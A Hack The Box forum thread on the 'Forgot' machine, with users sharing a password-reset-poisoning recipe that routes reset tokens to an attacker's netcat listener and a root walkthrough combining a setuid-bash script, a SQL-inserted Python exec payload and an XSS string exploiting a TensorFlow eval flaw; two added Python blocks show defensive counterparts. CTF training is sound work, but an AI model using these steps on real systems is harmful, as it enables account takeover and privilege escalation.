Forgot - HTB [Discussion]
(November 12, 2022, 11:22 PM)hunterxhack Wrote: can someone explain more how to get the token using password reset poisoning pls? After modifying the Host header so that it points to a domain that I control, what should I do?


1. set up netcat listener ex. nc -lvnp 7777
2. capture request for reset in burp for given user
3. change Host field to [your.ip.address]:7777 ex. Host: 10.10.14.88:7777
4. forward the request
5. wait for token to appear
Reply
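The defensive counterpart to the reset-poisoning steps above, as an added example (not code from the box or from HTB): a reset-link builder that roots the link at a configured origin and treats any Host header outside an allowlist as a poisoning attempt. CANONICAL_BASE_URL, ALLOWED_HOSTS and the sample hosts are constructed values.

```python
import re

# Constructed configuration: the hosts this deployment is actually served under.
# Reset links are built from CANONICAL_BASE_URL, never from the request.
CANONICAL_BASE_URL = "https://forgot.htb"
ALLOWED_HOSTS = {"forgot.htb", "www.forgot.htb"}

# hostname, optionally followed by :port; anything else (userinfo, paths,
# IPv6 literals, spaces) is refused outright
_HOST_RE = re.compile(r"^(?P<host>[a-z0-9.-]+)(?::\d{1,5})?$")


def host_header_is_trusted(host_header):
    """True only when the Host header names a host from ALLOWED_HOSTS.

    The comparison is case-insensitive and ignores the port, so
    'FORGOT.htb:443' is accepted while '10.10.14.88:7777' is not.
    """
    match = _HOST_RE.match((host_header or "").strip().lower())
    return bool(match) and match.group("host").rstrip(".") in ALLOWED_HOSTS


def build_reset_link(token, host_header):
    """Return the password-reset URL for `token`, rooted at the configured origin.

    The Host header is inspected only to detect poisoning attempts: a request
    carrying an untrusted Host gets no link (and, in a real app, a log entry),
    so the token can never be mailed to a host the client chose.
    """
    if not host_header_is_trusted(host_header):
        raise ValueError(f"untrusted Host header rejected: {host_header!r}")
    return f"{CANONICAL_BASE_URL}/reset?token={token}"
```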
(November 12, 2022, 11:30 PM)digPerfume Wrote: [...]

thank you ^^
Reply
(November 12, 2022, 11:14 PM)loosie Wrote: diego@forgot:~$ sudo -l
Matching Defaults entries for diego on forgot:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User diego may run the following commands on forgot:
    (ALL) NOPASSWD: /opt/security/ml_security.py


I need to root. Help me! Big hint needed.

[quote pid="806467" dateline="1668294881"]
I also am stuck with that script. My understanding of it is that it fetches the reason (select reason from escalate), puts it in an array and does some machine learning things I don't quite get. Pretty sure we gotta abuse that preprocess_input_exprs_arg_string since it has a safe flag at False but don't know how to inject commands into that...
[/quote]
Reply
(November 12, 2022, 11:47 PM)annehathaway Wrote: [...]

I'm stuck, brother.


(November 12, 2022, 11:47 PM)annehathaway Wrote: [...]
I think we need to get admin_token.


(November 12, 2022, 11:50 PM)loosie Wrote: [...]

Didn't work!
Reply
Any tip on foothold to user? I honestly cannot be arsed to try different things on this dogshit box that lets me send one request per session before it logs me out and I need to start over.
Reply
(November 13, 2022, 12:37 AM)sempit3rnal Wrote: [...]


It's in the forum, look over it. Someone just posted the step-by-step instructions.
Reply
For root:

First get two ssh sessions.

Create the /dev/shm/lol.sh script. Something like this:

#!/bin/bash
chmod +s /bin/bash


Don't forget to make it executable.

Read the database creds from /opt/security/ml_security.py and log in to the database. Run these:

use app;
insert into escalate values ("lol","lol","lol",'hello=exec("""
import os
os.system("/dev/shm/lol.sh")
print("&ErrMsg=%3Cimg%20src=%22http://imgur.com/bTkSe.png%22%20/%3E%3CSCRIPT%3Ealert%28%22xss%22%29%3C/SCRIPT%3E")""")');


On the second session just run:

sudo /opt/security/ml_security.py


And the /dev/shm/lol.sh should get run by root.

To explain it briefly:

The Python script basically checks the reasons from the escalate table in the database for XSS using machine learning. If they get a score higher than .5, they get passed to the preprocess_input_exprs_arg_string function, which is vulnerable in TensorFlow < 2.6.4 (the box has 2.6.3): https://github.com/advisories/GHSA-75c9-jrh4-79mc

Hence, all the stuff in the print function to make it pass the test.

Reply
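Why the walkthrough above works and what the 2.6.4 fix changes, as an added example for this thread (not the box's ml_security.py and not TensorFlow's code): a key=expr parser with the eval path beside the literal-only path, plus a triage helper a defender can run over stored reasons before any eval-based tool sees them. The sample rows and the RAN sink are constructed.

```python
import ast

# Constructed stand-ins for rows read from the escalate table's reason column.
# Each follows the "key=expr;key=expr" shape the thread's parser expects.
SAMPLE_REASONS = [
    "hello=[1, 2, 3];count=4",       # plain literals: the legitimate use
    "hello=RAN.append('executed')",  # a call expression: code, not data
]

RAN = []  # side-effect sink that records whether an expression actually ran


def preprocess_input_exprs(input_exprs_str, safe=True):
    """Parse "key=expr;..." into a dict (re-implementation, not TensorFlow's).

    safe=True  -> ast.literal_eval: only Python literals (numbers, strings,
                  lists, dicts, ...) are accepted; anything else raises.
    safe=False -> eval: the expression is executed, so a caller that feeds it
                  attacker-controlled text hands over code execution.
    """
    result = {}
    for raw in filter(bool, input_exprs_str.split(";")):
        if "=" not in raw:
            raise ValueError(f"expected key=expr, got {raw!r}")
        key, expr = raw.split("=", 1)
        if safe:
            try:
                result[key] = ast.literal_eval(expr)
            except (ValueError, SyntaxError) as exc:
                raise ValueError(f"non-literal expression for {key!r}") from exc
        else:
            result[key] = eval(expr)  # the unsafe path the thread describes
    return result


def triage_reasons(reasons):
    """Defender's check: classify each stored reason as a pure literal or as
    something the safe parser rejects, without ever executing it."""
    verdicts = {}
    for reason in reasons:
        try:
            preprocess_input_exprs(reason, safe=True)
            verdicts[reason] = "literal"
        except ValueError:
            verdicts[reason] = "rejected"
    return verdicts
```

The ML score in front of the parser is a filter on content, not a boundary: the safe parser rejects the second row regardless of how it is worded, which is why the literal-only path is the real fix.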
(November 13, 2022, 01:14 AM)josh007 Wrote: how to get a reverse shell? I am stuck. The admin doesn't see the tickets


Look at the source code to see where to find the admin tickets.
Reply
I found it but access is denied :/
Reply
How did you guys get admin access? I've been trying to trigger XSS from the /escalate endpoint, but to no avail.
Reply

